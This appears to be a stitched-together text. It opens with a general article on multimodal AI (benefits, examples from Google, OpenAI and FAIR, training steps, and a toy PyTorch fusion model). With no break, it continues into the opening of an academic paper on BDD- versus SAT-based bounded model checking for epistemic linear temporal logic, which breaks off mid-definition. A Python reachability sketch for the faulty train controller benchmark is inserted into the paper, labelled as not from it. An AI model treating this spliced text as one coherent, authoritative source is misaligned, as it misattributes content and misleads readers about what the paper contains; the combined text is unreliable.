Single-modality AI systems, which only use one type of data, can be quite limited. For instance, a text-based AI might not understand the context of an image, and an image-based AI might miss the nuances of speech. Multimodal AI offers a richer, more comprehensive understanding by using multiple data sources. This can significantly enhance the abilities of AI systems in various applications.

• Better Comprehension: Multimodal AI can comprehend information that single-mode systems might miss. For example, a multimodal AI can read an article, recognize related images, and connect them to videos, offering a holistic view of the content.
• Contextual Awareness: By processing various types of data simultaneously, multimodal AI can understand context better. This can be particularly useful in applications like virtual assistants and customer service bots.
• Enhanced User Experience: Systems like Google Assistant and Amazon Alexa greatly benefit from multimodal training. They can interpret voice commands, process textual information, and respond more accurately because they understand multiple types of input.

Examples of Multimodal AI

Many major companies are working on multimodal AI. Let's look at some real-life examples.

1. Google

Google is heavily invested in multimodal AI. One of its most impressive feats is combining image recognition with text analysis. For instance, Google Photos can identify people, places, and things in your pictures. When combined with Google Search, this technology can provide a comprehensive search experience, linking related articles, images, and videos.

2. OpenAI

OpenAI, known for its language model called GPT-3, is exploring the possibilities of multimodal AI as well. They're investigating how combining text with other data types can create more intelligent and useful systems. Imagine asking a virtual assistant to analyze a chart in a document while also generating a summary of the surrounding text. This dual capability can be extremely powerful for business applications.

3. Facebook AI Research

Facebook AI Research (FAIR) is another key player in this field.
Their work in understanding the connections between text and images aims to improve user interaction on platforms like Facebook and Instagram. By integrating visual and textual data, they can create more meaningful user experiences, such as auto-captioning pictures or suggesting relevant hashtags.

How Does Multimodal AI Training Work?

Training a multimodal AI system involves several steps. Let's break it down:

1. Data Collection: The first step is gathering a diverse set of data. This could include text, images, videos, and audio recordings. The data must be relevant and representative of the tasks the AI will perform.
2. Preprocessing: Before feeding the data into the AI model, it needs to be cleaned and organized. This might include removing noise from audio recordings, aligning text with images, or breaking videos into manageable segments.
3. Feature Extraction: This is the process of identifying unique characteristics in the data. For text, it might involve extracting keywords. For images, it might mean identifying shapes and colors. For audio, it can be recognizing pitch and tone.
4. Model Integration: The different types of data are then fed into an AI model. Advanced machine learning techniques, such as neural networks, help the model learn patterns and relationships across the different modalities (a toy sketch of this step appears at the end of this article).
5. Training: The AI system undergoes rigorous training, where it processes vast amounts of multimodal data. It learns to recognize connections and make predictions based on the integrated information.
6. Evaluation: Finally, the model is tested to see how well it performs. This might involve real-world tasks or simulations to ensure it can handle the complexity of multimodal data.

Challenges in Multimodal AI Training

There are several challenges in multimodal AI training that researchers and AI developers are working to overcome.

• Data Alignment: Matching data from different modalities can be tricky. For example, aligning the text from a lecture with the corresponding slides and audio is not straightforward.
• Computational Resources: Multimodal training requires significant computational power. Training an AI model to process text, images, video, and audio simultaneously is resource-intensive and time-consuming.
• Context Understanding: Even with multimodal data, understanding context is a complex task. Differentiating between sarcasm and sincerity in text, based on complementary images or videos, is a current research challenge.
• Data Quality: Ensuring the quality and accuracy of the diverse data types is crucial. Inconsistent or erroneous data can lead to incorrect AI training outcomes.

The Future of Multimodal AI

The potential for multimodal AI is vast and exciting. As technology advances, these systems will become more sophisticated and integrated into everyday life. We can expect more intuitive virtual assistants, smarter customer service bots, and even better tools for education and healthcare.

Imagine a future where an AI tutor can teach you a foreign language by showing pictures, playing audio clips, and displaying relevant text and videos. Or consider AI in healthcare, where doctors can receive comprehensive analysis combining patient records, imaging data, and genetic information to make better diagnostic decisions.

The journey of multimodal AI is just beginning, and the future holds incredible promise. As researchers and technology companies continue to innovate, the capabilities of AI systems will only grow more unified and intelligent.
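To make steps 3 through 5 of the pipeline concrete, here is a deliberately tiny late-fusion model in PyTorch: two modality-specific encoders produce feature vectors that are concatenated and classified. All dimensions, names, and the random stand-in "data" are illustrative assumptions, not any production system.

```python
import torch
import torch.nn as nn

class TinyMultimodalClassifier(nn.Module):
    """Toy late-fusion model: encode each modality, concatenate, classify."""

    def __init__(self, text_dim=300, image_dim=512, hidden=128, classes=10):
        super().__init__()
        # One encoder per modality (feature extraction, step 3).
        self.text_encoder = nn.Sequential(nn.Linear(text_dim, hidden), nn.ReLU())
        self.image_encoder = nn.Sequential(nn.Linear(image_dim, hidden), nn.ReLU())
        # Fusion by concatenation plus a prediction head (model integration, step 4).
        self.head = nn.Linear(2 * hidden, classes)

    def forward(self, text_feats, image_feats):
        fused = torch.cat(
            [self.text_encoder(text_feats), self.image_encoder(image_feats)], dim=-1
        )
        return self.head(fused)

model = TinyMultimodalClassifier()
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
loss_fn = nn.CrossEntropyLoss()

# One training step (step 5) on random stand-in tensors for a batch of 8 examples.
text_batch, image_batch = torch.randn(8, 300), torch.randn(8, 512)
labels = torch.randint(0, 10, (8,))
loss = loss_fn(model(text_batch, image_batch), labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
print(f"toy training loss: {loss.item():.3f}")
```

Real systems replace the linear encoders with pretrained text and vision backbones and often fuse with attention rather than concatenation, but the aligned-then-fused structure is the same.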
Autonomous Agents and Multi-Agent Systems, Volume 28, Issue 4, pp 558-604

BDD- versus SAT-based bounded model checking for the existential fragment of linear temporal logic with knowledge: algorithms and their performance

Artur Mȩski, Wojciech Penczek, Maciej Szreter, Bożena Woźna-Szcześniak, Andrzej Zbrzezny

Open Access Article

Abstract

The paper deals with symbolic approaches to bounded model checking (BMC) for the existential fragment of linear temporal logic extended with the epistemic component (ELTLK), interpreted over interleaved interpreted systems. Two translations of BMC for ELTLK, to SAT and to operations on BDDs, are presented. The translations have been implemented, tested, and compared with each other as well as with another tool on several benchmarks for MAS. Our experimental results reveal advantages and disadvantages of SAT- versus BDD-based BMC for ELTLK.

Keywords: Bounded model checking; Binary decision diagrams; Propositional satisfiability problem (SAT); Interpreted systems; Interleaved interpreted systems; Epistemic linear temporal logic

1 Introduction

Verification of multi-agent systems (MAS) is an actively developing field of research [7, 8, 14, 24, 25, 30, 47]. Several approaches based on model checking [12, 48] have been put forward for the verification of MAS. Typically, they employ combinations of epistemic logic with either branching [8, 30, 43] or linear time temporal logic [17, 22, 38]. Some approaches reduce the verification problem to the one for plain temporal logic [6, 22], while others treat typical MAS modalities such as (distributed, common) knowledge as first-class citizens and introduce novel algorithms for them [38, 43].

In an attempt to alleviate the state-space explosion problem (i.e., an exponential growth of the system state space with the number of agents), two main approaches have been proposed, based on combining bounded model checking (BMC) with symbolic verification using translations to either ordered binary decision diagrams (BDDs) [26] or propositional logic (SAT) [41]. However, the above approaches deal only with properties expressed in the existential fragment of CTLK (i.e., CTL extended with the existential epistemic components, called ECTLK). In the paper [46] a method for model checking LTLK formulae using BDDs is described, but it is not explained how it can be used for BMC.

In this paper we aim at completing the picture of applying BMC-based symbolic verification to MAS by looking at the existential fragment of LTLK (i.e., LTL extended with the existential epistemic components, called ELTLK), interpreted over both the subclass of interpreted systems (IS) called interleaved interpreted systems (IIS) [31] and interpreted systems themselves. IIS are an asynchronous subclass of interpreted systems [16] in which only one action at a time is performed in a global transition. Our original contribution consists in defining the following four novel bounded model checking methods for ELTLK: the SAT-based BMC for IS and for IIS, and the BDD-based BMC for IS and for IIS. Moreover, we would like to point out that the proposed SAT-based BMC for ELTLK and for IS has never been defined and experimentally evaluated before. Next, both the presented BDD-based methods have been published earlier, but only in the informal proceedings of the LAM'2012 workshop.
All the proposed BMC methods have been implemented as prototype modules of Verics [28], tested, and compared with each other as well as with MCK [17] on three well-known benchmarks for MAS: a (faulty) train controller system [21], a (faulty) generic pipeline paradigm [40], and the dining cryptographers [10]. Our experimental results reveal not only advantages and disadvantages of ELTLK SAT- versus BDD-based BMC for MAS that are consistent with comparisons for temporal logics [9, 13], but also two novel findings. Namely, IIS semantics can improve the practical applicability of BMC, and the BDD-based approach appears to be superior for IIS semantics, while the SAT-based approach appears to be superior for IS semantics.

The rest of the paper is organised as follows. In Sect. 2 we recall interpreted systems (IS), interleaved interpreted systems (IIS), the logic LTLK, and its two subsets: LTL and ELTLK (i.e., the existential fragment of LTLK). Section 3 deals with Bounded Model Checking (BMC), where Sect. 3.1 describes BDD-based BMC for ELTLK and Sect. 3.2 presents SAT-based BMC for ELTLK. In the last section we discuss our experimental results and conclude the paper.

1.1 Related work

Model checking of knowledge properties was first considered by Vardi and Halpern [20]. The complexity of the model checking problem for LTL combined with epistemic modalities in the perfect recall semantics was studied by van der Meyden and Shilov [38]. Raimondi et al. showed a BDD-based method for model checking CTLK [43]. Su et al. [46] described a method for model checking LTLK formulae using BDDs. Van der Hoek et al. [22] proposed a method for model checking LTLK formulae using the logic of local propositions.

The origins of bounded model checking (BMC) go back to the seminal papers [4] and [3], where the method was defined for LTL properties and Boolean circuits. The main motivation for defining BMC was to take advantage of the immense success of SAT-solvers (i.e., tools implementing algorithms solving the satisfiability problem for propositional formulae). The first SAT-based BMC method for MAS was proposed in [41]. It deals with the existential fragment of the branching time logic extended with the epistemic components (ECTLK) and the interpreted systems. An implementation and experimental evaluation of this BMC method for the interleaved interpreted systems have been presented in [29]. For the same logic and for the standard interpreted systems, Jones et al. proposed a BMC method based on BDDs [26]. In [53] the SAT-based BMC method for the existential fragment of RTCTL augmented to include epistemic modalities (RTECTLK) and for the interleaved interpreted systems was introduced and experimentally evaluated. This BMC encoding takes into account the substantial improvement of the BMC encoding for ECTL that was defined in [54]. Further, since RTECTLK is an extension of ECTLK such that the range of every temporal operator can be bounded, the BMC encoding of [53] substantially improves the BMC encodings presented in [29, 41]. In [37] a BDD-based BMC method for RTECTLK over interleaved interpreted systems was defined and compared to the corresponding SAT-based BMC method. Further, in [49] the SAT-based BMC method for the deontic interpreted systems and for ECTLK extended to include the existential deontic modalities was defined.
A more efficient translation to SAT together with an implementation and an experimental evaluation of this BMC method are shown in [51], where the SAT-based BMC method for RTECTLK augmented to include the existential deontic modalities was defined. In [23] a new SAT-based BMC encoding for fair ECTLK was presented. Next, in [32] the SAT-based BMC method for the real-time interpreted systems and for the existential fragment of TCTL extended to include epistemic modalities was shown. All the above BMC approaches deal with properties expressed in the existential fragments of branching time temporal logics only.

For the linear time temporal-epistemic properties, until now, the following BMC methods have been developed. In [42] a SAT-based BMC method for ELTLK over interleaved interpreted systems has been defined. The main difficulty in the extension of the SAT-based BMC method for ELTL to the properties expressible in ELTLK was in the encoding of the looping conditions. This difficulty arises from the fact that in SAT-based BMC for ELTLK we need to consider more than one path. The BMC encoding presented in [42] is not based on the state-of-the-art BMC method for \(\mathrm{ECTL}^{*}\) [55], which uses a reduced number of paths and a more efficient encoding of loops, which results in significantly smaller and less complicated propositional formulae that encode the ELTLK properties. For the same logic over the same systems, in [33] a BDD-based BMC method was introduced. Next, in [52] a SAT-based BMC method for the existential fragment of Metric LTL with epistemic and deontic modalities (EMTLKD) over deontic interleaved interpreted systems was defined. The usefulness of SAT-based BMC for error tracking and its complementarity to BDD-based symbolic model checking have already been proven in several works, e.g., [9, 13, 35, 36]. Further, in [34] the semantics of interpreted systems and interleaved interpreted systems were experimentally evaluated by means of the BDD-based BMC method for LTLK. Partial-order reductions for model checking of interleaved interpreted systems were presented in [31].

Table 1 provides a summary of the existing implementations of model checking techniques for MAS in the BMC context. Table 2 summarises the existing BMC techniques for MAS.

Table 1 Summary of the tools and model checking techniques for temporal-epistemic-deontic logics (the BMC methods are defined for the existential fragments of the mentioned logics)

Logic    | SAT-BMC            | BDD-BMC        | Not BMC
CTLK     | VerICS/IIS, MCK/IS | MCMAS/IS       | MCMAS/IS, MCK/IS
CTLKD    | VerICS/IIS         |                | MCMAS/IS
LTLK     | VerICS/IS+IIS      | VerICS/IS+IIS  | MCK/IS
CTL*K    | MCK/IS             |                | MCK/IS
RTCTLK   | VerICS/IIS         | VerICS/IIS     |
RTCTLKD  | VerICS/IIS         |                |

Table 2 Summary of the BMC techniques for temporal-epistemic-deontic logics (\(^\mathrm{a}\) denotes BMC methods that have not been implemented)

Logic     | SAT-BMC: IIS | SAT-BMC: IS  | BDD-BMC: IIS | BDD-BMC: IS
ELTLK     | [42]         |              | [33]         | [34]
ECTLK     | [29]         | [41]^a, [23] |              | [26]
ECTLKD    |              | [49]^a       |              |
RTECTLK   | [53]         |              | [37]         |
RTECTLKD  | [51]         |              |              |
TECTLK    | [32]         |              |              |
EMTLKD    | [52]         |              |              |

This paper combines and refines our preliminary results published in the informal proceedings of two workshops, the CS&P'2011 [33] and the LAM'2012 [34], in the conference paper [36], and in the journal paper [42]. More precisely, for the interleaved interpreted systems and for the ELTLK properties we present a BDD-based BMC technique and an improved SAT-based BMC method that previously appeared in, respectively, [33, 36] and [36, 42].
For the interpreted systems and for the ELTLK properties we present a BDD-based BMC technique that previously appeared in [34]. Both SAT-based BMC methods are based on the SAT-based BMC technique for \(\mathrm{ECTL}^{*}\) that was introduced in [55].

2 Preliminaries

In this section we introduce the basic definitions used in the paper. In particular, we define interpreted and interleaved interpreted systems, and the syntax and semantics of linear temporal logic extended with the epistemic component (LTLK) and its two subsets ELTLK and LTL.

2.1 Interpreted systems

The semantics of interpreted systems (IS) provides a setting to reason about multi-agent systems (MASs) by means of specifications based on knowledge and linear or branching time. We report here the basic setting as popularised in [16]. We begin by assuming that a MAS is composed of \(n\) agents (by \({\mathcal{A }}=\{1,\ldots ,n\}\) we denote the non-empty set of agents) and a special agent \({e}\) which is used to model the environment in which the agents operate. We associate a set of possible local states \(L_{{ c}}\) and actions \(Act_{{ c}}\) to each agent \({ c}\in {\mathcal{A }} \cup \{{e}\}\). For any agent \({{ c}}\in {\mathcal{A }} \cup \{{e}\}\) we assume that the special action \(\epsilon _{{ c}}\), called the "null" action of agent \({{ c}}\), belongs to \(Act_{{ c}}\). For convenience, the symbol \(Act\) denotes the Cartesian product of the agents' actions, i.e. \(Act = Act_1\times \dots \times Act_n \times Act_{{e}}\). An element \(a \in Act\) is a tuple of actions (one for each agent) and is referred to as a joint action. Following closely the interpreted system model, we consider a local protocol modelling the program the agent is executing. Formally, for any agent \({{ c}}\in {\mathcal{A }} \cup \{{e}\}\), the actions of the agents are selected according to a local protocol function \(P_{{ c}}: L_{{ c}} \rightarrow 2^{Act_{{ c}}}\), which maps local states to sets of possible actions for agent \({ c}\). Further, for each agent \({{ c}}\) we define a (partial) evolution function \(t_{{ c}}: L_{{ c}} \times Act \rightarrow L_{{ c}}\). We assume that if \(\epsilon _{{ c}} \in P_{{ c}}(\ell )\), then \(t_{{ c}}(\ell ,(a_1,\ldots ,a_n,a_{{e}})) = \ell \) for \(a_{{ c}}=\epsilon _{{ c}}\) and \(a_i \in Act_i\) for \(1 {\,\leqslant \,}i {\,\leqslant \,}n\), and \(a_{{e}} \in Act_{{e}}\).

A global state \(g = (\ell _1, \dots , \ell _n, \ell _{{e}})\) is a tuple of local states for all the agents in the MAS corresponding to an instantaneous snapshot of the system at a given time. Given a global state \(g=(\ell _1,\dots , \ell _n, \ell _{{e}})\), we denote by \(l_{{ c}}(g)=\ell _{{ c}}\) the local component of agent \({{ c}} \in {\mathcal{A }}\cup \{{e}\}\) in \(g\). Let \(G\) be a set of global states. For a given set of agents \(\mathcal{A }\), the environment \({e}\), and a set of propositional variables \(\mathcal{PV }\), which can be either true or false, an interpreted system is a tuple
$$\begin{aligned} \text {IS}=(\iota , \{L_{{ c}}, Act_{{ c}},P_{{ c}},t_{{ c}}\}_{{{ c}}\in {\mathcal{A }} \cup \{{e}\}},\mathcal{V }) \end{aligned}$$
where \(\iota \in G\) is the initial global state, and \({\mathcal{V }}: G \rightarrow 2^{\mathcal{PV }}\) is a valuation function. Given the notions above we can now define formally the global (partial) evolution function.
Namely, the global (partial) evolution function \(t: G \times Act \rightarrow G\) is defined as follows: \(t(g,a)= g'\) iff for all \({ c}\in {\mathcal{A }},\,t_{{ c}}(l_{{ c}}(g),a) = l_{{ c}}(g')\) and \(t_{{e}} (l_{{e}}(g), a) = l_{{e}}(g')\). In brief we write the above as \(g \stackrel{a}{\longrightarrow } g'\).

With each IS we associate a Kripke model, which is a tuple
$$\begin{aligned} M=(G,\iota ,T,\{\sim _{{ c}}\}_{{{ c}} \in \mathcal{A }},\mathcal{V }) \end{aligned}$$
where \(G=\prod _{{ c}=1}^n L_{{ c}}\times L_{{e}}\) is a set of the global states, \(\iota \in G\) is the initial (global) state, and \(T \subseteq G \times G\) is a global transition relation on \(G\) defined by: \((g , g') \in T\) iff there exists an action \(a \in Act\) such that \(g \stackrel{a}{\longrightarrow } g'\). We assume that the relation is total, i.e., for any \(g\in G\) there exists an \(a \in Act\) such that \(g \stackrel{a}{\longrightarrow } g'\) for some \(g' \in G\). Further, \(\sim _{{ c}} \subseteq G \times G\) is an epistemic indistinguishability relation for each agent \({{ c}}\in \mathcal{A }\), defined by \(g \sim _{{ c}} r\) if \(l_{{ c}}(g) = l_{{ c}}(r)\), and \({\mathcal{V }}: G \rightarrow 2^{\mathcal{PV }}\) is the valuation function of the IS.

2.2 Interleaved interpreted systems

Interleaved interpreted systems (IIS) [31] are a restriction of interpreted systems, where all the joint actions are of a special form. More precisely, we assume that if more than one agent is active at a given state, i.e., executes a non-null action, then all the active agents perform the same (shared) action in the round. Formally, for any agent \({{ c}}\in {\mathcal{A }} \cup \{{e}\}\) we assume that the special action \(\epsilon _{{ c}}\), called the "null" action of agent \({{ c}}\), belongs to \(Act_{{ c}}\); as will become clear below, the local state of agent \({{ c}}\) remains the same if the null action is performed. Next, \(Act = \bigcup _{{ c}\in {\mathcal{A }}} Act_{{ c}} \cup Act_{{e}}\), and for each action \(a\), by \(Agent(a) \subseteq {\mathcal{A }}\cup \{{e}\}\) we mean all the agents \({ c}\) such that \(a \in Act_{{ c}}\), i.e., the set of agents potentially able to perform \(a\). Further, for each agent \({{ c}} \in {\mathcal{A }}\cup \{{e}\}\), the actions are selected according to a local protocol function \(P_{{ c}}: L_{{ c}} \rightarrow 2^{Act_{{ c}}}\) such that \(\epsilon _{{ c}} \in P_{{ c}}(\ell )\) for any \(\ell \in L_{{ c}}\), i.e., we insist on the null action being enabled at every local state. Next, for each agent \({{ c}} \in {\mathcal{A }}\cup \{{e}\}\), we define a (partial) evolution function \(t_{{ c}}: L_{{ c}} \times Act_{{ c}} \rightarrow L_{{ c}}\), where \(t_{{ c}}(\ell ,\epsilon _{{ c}}) = \ell \) for each \(\ell \in L_{{ c}}\). The local evolution function considered here differs from the standard treatment in interpreted systems by having the local action as the parameter instead of the joint action.

Let \(G\) be a set of global states. For a given set of agents \(\mathcal{A }\), the environment \({e}\), and a set of propositional variables \(\mathcal{PV }\), which can be either true or false, an interleaved interpreted system is a tuple
$$\begin{aligned} \text {IIS}=(\iota , \{L_{{ c}}, Act_{{ c}},P_{{ c}},t_{{ c}}\}_{{{ c}}\in {\mathcal{A }}\cup \{{e}\}},\mathcal{V }) \end{aligned}$$
where \(\iota \in G\) is the initial global state, and \({\mathcal{V }}: G \rightarrow 2^{\mathcal{PV }}\) is a valuation function.
Given the notions above we can now define formally the global (partial) interleaved evolution function. Namely, the global (partial) interleaved evolution function \(t: G\times \prod _{{{ c}} = 1}^n Act_{{ c}} \times Act_{{e}} \rightarrow G\) is defined as follows: \(t(g,a_1,\dots , a_n, a_{{e}})= g'\) iff there exists an action \(a \in Act \setminus \{\epsilon _1,\ldots ,\epsilon _n, \epsilon _{{e}}\}\) such that for all \({{ c}} \in Agent(a),\,a_{{ c}} = a\) and \(t_{{ c}}(l_{{ c}}(g),a) = l_{{ c}}(g')\), and for all \({{ c}} \in ({\mathcal{A }} \cup \{{e}\}) \setminus Agent(a),\,a_{{ c}} = \epsilon _{{ c}}\) and \(t_{{ c}}(l_{{ c}}(g),\epsilon _{{ c}}) = l_{{ c}}(g)\). In brief we write the above as \(g \stackrel{a}{\longrightarrow } g'\).

Similar to blocking synchronisation in automata, the above insists on all agents performing the same non-epsilon action in a global transition; additionally, note that if an agent has the action being performed in its repertoire, it must perform it for the global transition to be allowed. This assumes that the local protocols are defined to permit this; if a local protocol does not allow it, then the local action cannot be performed and therefore the global transition does not comply with the global interleaved evolution function as defined above.

With each IIS we associate a Kripke model, which is a tuple
$$\begin{aligned} M=(G,\iota ,T,\{\sim _{{ c}}\}_{{{ c}} \in \mathcal{A }},\mathcal{V }) \end{aligned}$$
where \(G=\prod _{{ c}=1}^n L_{{ c}} \times L_{{e}}\) is a set of the global states, \(\iota \in G\) is the initial (global) state, and \(T \subseteq G \times G\) is a global (interleaved) transition relation on \(G\) defined by: \((g , g') \in T\) iff there exists an action \(a \in Act \setminus \{\epsilon _1,\ldots ,\epsilon _n,\epsilon _{{e}}\}\) such that \(g \stackrel{a}{\longrightarrow } g'\). We assume that the relation is total, i.e., for any \(g\in G\) there exists an \(a \in Act \setminus \{\epsilon _1,\ldots ,\epsilon _n,\epsilon _{{e}}\}\) such that \(g \stackrel{a}{\longrightarrow } g'\) for some \(g' \in G\). Further, \(\sim _{{ c}}\; \subseteq G \times G\) is an epistemic indistinguishability relation for each agent \({{ c}}\in \mathcal{A }\), defined by \(g \sim _{{ c}} r\) if \(l_{{ c}}(g) = l_{{ c}}(r)\), and \({\mathcal{V }}: G \rightarrow 2^{\mathcal{PV }}\) is the valuation function of the IIS.

2.3 Runs and paths

Let \(M\) be a model generated by either an IS or an IIS. Then, an infinite sequence of global states \(\rho =g_0 g_1 g_2\dots \) is called a run originating at \(g_0\) if there is a sequence of transitions from \(g_0\) onwards such that \((g_i , g_{i+1})\in T \) for every \(i {\,\geqslant \,}0\). The \(m\)-th prefix of \(\rho \), denoted by \(\rho [..m]\), is defined as \(\rho [..m] = (g_0, g_1 ,\ldots , g_m)\). Any finite prefix of a run is called a path. By \(length(\rho )\) we mean the number of the states of \(\rho \) if \(\rho \) is a path, and \(\omega \) if \(\rho \) is a run. In order to limit the index range of \(\rho \), which can be either a path or a run, we define the relation \(\unlhd _\rho \). Let \(\unlhd _\rho \stackrel{def}{=}<\) if \(\rho \) is a run, and \(\unlhd _\rho \stackrel{def}{=}{\,\leqslant \,}\) if \(\rho \) is a path. The set of all the paths and runs originating from \(g\) is denoted by \(\varPi (g)\). The set of all the paths and runs originating from all states in \(G\) is defined as \(\varPi = \bigcup _{g \in G} \varPi (g)\).
The set of all the runs originating from \(g\) is denoted by \(\varPi ^\omega (g)\). The set of all the runs originating from all states in \(G\) is defined as \(\varPi ^\omega = \bigcup _{g \in G} \varPi ^\omega (g)\). A state \(g\) is reachable from \(g_0\) if there is a path \(\rho =g_0 g_1 g_2 \ldots g_n\) for \(n {\,\geqslant \,}0\) such that \(g = g_n\).

2.4 Examples of MASs and their models

In this section we present MASs modelled by means of interpreted systems and interleaved interpreted systems. We use these systems to evaluate the bounded model checking methods considered in the paper. In what follows we denote by \(\overline{\epsilon }\) the joint null action, i.e., the action composed of the null actions only.

2.4.1 A faulty train controller system (FTC)

The FTC (adapted from [21]) consists of a controller and \(n\) trains (for \(n{\,\geqslant \,}2\)), one of which is dysfunctional. It is assumed that each train uses its own circular track for travelling in one direction. At one point, all trains have to pass through a tunnel, but because there is only one track in the tunnel, trains arriving from each direction cannot use it simultaneously. There are signals on both sides of the tunnel, which can be either red or green. All trains except the one with a faulty signalling system notify the controller when they request entry to the tunnel or when they leave the tunnel. The controller controls the colour of the displayed signal. Figure 1 shows the local states, the possible actions, and the protocol for each agent. Null actions are omitted in the figure. Further, we assume that the local state \(Away_i\) is initial for Train \(i\), and the local state \(Green\) is initial for Controller.

Fig. 1 The FTC system

In the model we assume the following set of propositional variables: \({\mathcal{PV }}=\{ InTunnel_1,\ldots , InTunnel_n \}\) with the following interpretation: \((M,g) \models InTunnel_i\) if \(l_{Train_i}(g)= Tunnel_i\), for all \(i \in \{1,\ldots ,n\}\). Let \(state\) denote a local state of an agent, and let \(Act=Act_{Train_1}\times \cdots \times Act_{Train_n} \times Act_{Controller}\) with \(Act_{Train_i} = \{approach_i, in_i, out_i, \epsilon _i\}\) where \(1{\,\leqslant \,}i {\,\leqslant \,}n\), and \(Act_{Controller} = \bigcup _{i=1}^{n-1} \{in_i, out_i\} \cup \{\epsilon \}\). Moreover, for \(a \in Act\), let \(act_i(a)\) denote the action of Train \(i\), and \(act_C(a)\) the action of Controller.

In the IS model of the system we assume the following local evolution functions:

• Let \(1{\,\leqslant \,}i {\,\leqslant \,}n\).
The local evolution function for Train \(i\) is defined as follows:
• \(t_{Train_i}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_i(a)=\epsilon _i\)
• \(t_{Train_i}(Away_i,a) = Wait_i\) if \(act_i(a)=approach_i\)
• \(t_{Train_i}(Wait_i,a) = Tunnel_i\) if \(act_i(a)=in_i\) and \(act_C(a)=in_i\) and \(i\ne n\)
• \(t_{Train_i}(Tunnel_i,a) = Away_i\) if \(act_i(a)=out_i\) and \(act_C(a)=out_i\) and \(i\ne n\)
• \(t_{Train_n}(Wait_n,a) = Tunnel_n\) if \(act_n(a)=in_n\)
• \(t_{Train_n}(Tunnel_n,a) = Away_n\) if \(act_n(a)=out_n\)

The local evolution function for Controller is defined as follows:
• \(t_{Controller}(state,a) = state\) if \(act_C(a)=\epsilon \)
• \(t_{Controller}(Green,a) = Red\) if \(act_i(a)=in_i\) and \(act_C(a)=in_i\) and \(i\ne n\)
• \(t_{Controller}(Red, a) = Green\) if \(act_i(a)=out_i\) and \(act_C(a)=out_i\) and \(i\ne n\)

In the IIS model of the system we assume the following local evolution functions:

For Train \(i\), \(t_{Train_i}\) is defined as follows:
• \(t_{Train_i}(state,\epsilon _i) = state\), for \(1{\,\leqslant \,}i {\,\leqslant \,}n\)
• \(t_{Train_i}(Away_i,approach_i) = Wait_i\), for \(1{\,\leqslant \,}i {\,\leqslant \,}n\)
• \(t_{Train_n}(Wait_n,in_n) = Tunnel_n\)
• \(t_{Train_i}(Wait_i,in_i) = Tunnel_i\) if \(act_C(a)=in_i\) and \(act_j(a)=\epsilon _j\) for all \(1{\,\leqslant \,}j< n \) such that \(j\ne i\)
• \(t_{Train_n}(Tunnel_n,out_n) = Away_n\)
• \(t_{Train_i}(Tunnel_i,out_i) = Away_i\) if \(act_C(a)=out_i\) and \(act_j(a)=\epsilon _j\) for all \(1{\,\leqslant \,}j< n \) such that \(j\ne i\)

For Controller, \(t_{Controller}\) is defined as follows:
• \(t_{Controller}(state,\epsilon ) = state\)
• \(t_{Controller}(Green,in_i) = Red\) if \(act_i(a)=in_i\), for \(1{\,\leqslant \,}i < n\)
• \(t_{Controller}(Red, out_i) = Green\) if \(act_i(a)=out_i\), for \(1{\,\leqslant \,}i < n\)
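To make the interleaved semantics of the FTC concrete, the following is a small, illustrative Python sketch (not tool code from the paper) that enumerates the reachable global states of the IIS model and checks whether two trains can occupy the tunnel at once. The encoding and state names are assumptions chosen for readability; train \(n\) is the faulty one, whose \(in\)/\(out\) actions are not shared with the controller.

```python
from collections import deque

N = 3  # number of trains; train N has the faulty signalling system

def enabled(state):
    """Actions enabled under IIS semantics: one (possibly shared) action per step."""
    trains, ctrl = state
    acts = []
    for i, loc in enumerate(trains, start=1):
        if loc == "Away":
            acts.append(("approach", i))      # local to Train i
        elif loc == "Wait":
            if i == N or ctrl == "Green":     # in_i is shared with Controller for i < N
                acts.append(("in", i))
        else:  # "Tunnel"
            if i == N or ctrl == "Red":       # out_i is shared with Controller for i < N
                acts.append(("out", i))
    return acts

def step(state, act):
    trains, ctrl = state
    kind, i = act
    trains = list(trains)
    if kind == "approach":
        trains[i - 1] = "Wait"
    elif kind == "in":
        trains[i - 1] = "Tunnel"
        if i != N:
            ctrl = "Red"                      # Controller moves in the same shared action
    else:
        trains[i - 1] = "Away"
        if i != N:
            ctrl = "Green"
    return (tuple(trains), ctrl)

init = (("Away",) * N, "Green")
seen, frontier = {init}, deque([init])
while frontier:
    s = frontier.popleft()
    for a in enabled(s):
        t = step(s, a)
        if t not in seen:
            seen.add(t)
            frontier.append(t)

print(len(seen), "reachable global states")
print("two trains in the tunnel simultaneously:",
      any(sum(loc == "Tunnel" for loc in s[0]) > 1 for s in seen))
```

Because train \(N\)'s entry bypasses the shared synchronisation with the controller, the final check prints True: mutual exclusion in the tunnel fails, which is exactly the fault this benchmark is designed to exhibit.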
2.4.2 Faulty generic pipeline paradigm (FGPP)

The FGPP (adapted from [40]) consists of the following agents: the Producer that is able to produce data, the Consumer that is able to receive data, a chain of \(n\) intermediate Nodes that are able to receive, process, and send data, and a chain of \(n\) Alarms that are enabled when some error occurs, i.e., when the \(Hang\_up_i\) \((1{\,\leqslant \,}i {\,\leqslant \,}n)\) operation is performed three times. If the \(Hang\_up_i\) action is performed only once or only twice, then the system recovers from the error. Figure 2 shows the local states, the possible actions, and the protocol for each agent. From Fig. 2 we can also deduce the local evolution function of the IIS. Null actions are omitted in the figure. Further, we assume that the local states \(ProdReady,\,NodeiReady,\,ConsReady\) and \(AlarmiReady\) are initial, respectively, for Producer, Node \(i\), Consumer, and Alarm \(i\).

Fig. 2 The FGPP system. Dashed lines correspond to the system behaviour after an error has occurred

In the model we assume the following set of propositional variables: \({\mathcal{PV }}=\{ ProdSend, ConsReady,\,Problem_1,\,\ldots \), \(Problem_n,\,Repair_1,\,\ldots ,\,Repair_n,\,Alarm_1Send,\,\ldots ,\,Alarm_nSend \}\) with the following interpretation:
• \((M,g)\models ProdSend\) if \(l_{Producer}(g)=ProdSend\)
• \((M,g)\models ConsReady\) if \(l_{Consumer}(g)=ConsReady\)
• \((M,g)\models Problem_i\) if \(l_{Alarm i}(g)= Problemi\), for all \(1{\,\leqslant \,}i {\,\leqslant \,}n\)
• \((M,g)\models Repair_i\) if \(l_{Alarm i}(g)= Repairi\), for all \(1{\,\leqslant \,}i {\,\leqslant \,}n\)
• \((M,g)\models Alarm_iSend\) if \(l_{Alarm i}(g)= AlarmiSend\), for all \(1{\,\leqslant \,}i {\,\leqslant \,}n\)

